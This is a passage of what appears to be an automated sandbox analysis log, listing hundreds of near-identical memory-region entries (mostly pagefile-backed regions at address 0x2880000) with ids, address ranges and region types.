"pagefile_0x0000000002880000" filename = "" Region: id = 7433 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7434 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7435 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7436 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7437 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7438 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7439 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7440 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7441 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7442 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7443 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7444 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7445 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7446 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7447 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7448 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7449 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7450 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7451 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7452 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7453 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7454 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7455 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7456 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7457 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7458 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7459 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7460 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7461 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7462 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7463 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7464 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7465 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7466 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7467 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7468 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7469 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7470 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7471 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7472 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 7473 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 7474 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7475 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7476 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7477 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7478 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7479 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7480 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7481 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7482 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7483 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7484 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7485 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7486 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7487 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7488 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7489 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7490 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7491 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7492 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7493 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7494 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7495 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7496 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7497 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7498 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7499 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7500 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7501 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7502 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7503 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7504 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7505 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7506 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7507 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7508 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7509 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7510 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7511 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7512 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7513 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7514 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7515 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7516 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7517 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7518 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7519 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7520 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7521 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7522 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7523 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7524 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7525 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7526 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7527 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7528 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7529 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7530 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7531 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7532 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7533 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7534 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7535 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7536 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7537 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7538 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7539 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7540 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7541 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7542 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7543 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7544 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7545 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7546 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7547 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7548 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7549 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7550 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7551 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7552 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7553 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7554 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7555 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7556 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7557 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7558 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7559 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7560 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7561 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7562 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7563 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7564 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7565 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7566 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7567 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7568 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7569 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7570 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7571 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7572 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7573 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7574 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7575 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7576 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7577 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7578 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7579 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7580 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7581 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 7582 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 7583 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7584 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7585 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7586 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7587 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7588 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7589 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7590 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7591 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7592 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7593 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7594 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7595 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7596 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7597 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7598 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7599 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7600 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7601 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7602 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7603 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7604 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7605 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7606 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7607 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7608 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7609 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7610 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7611 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7612 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7613 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7614 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7615 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7616 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7617 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7618 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7619 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7620 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 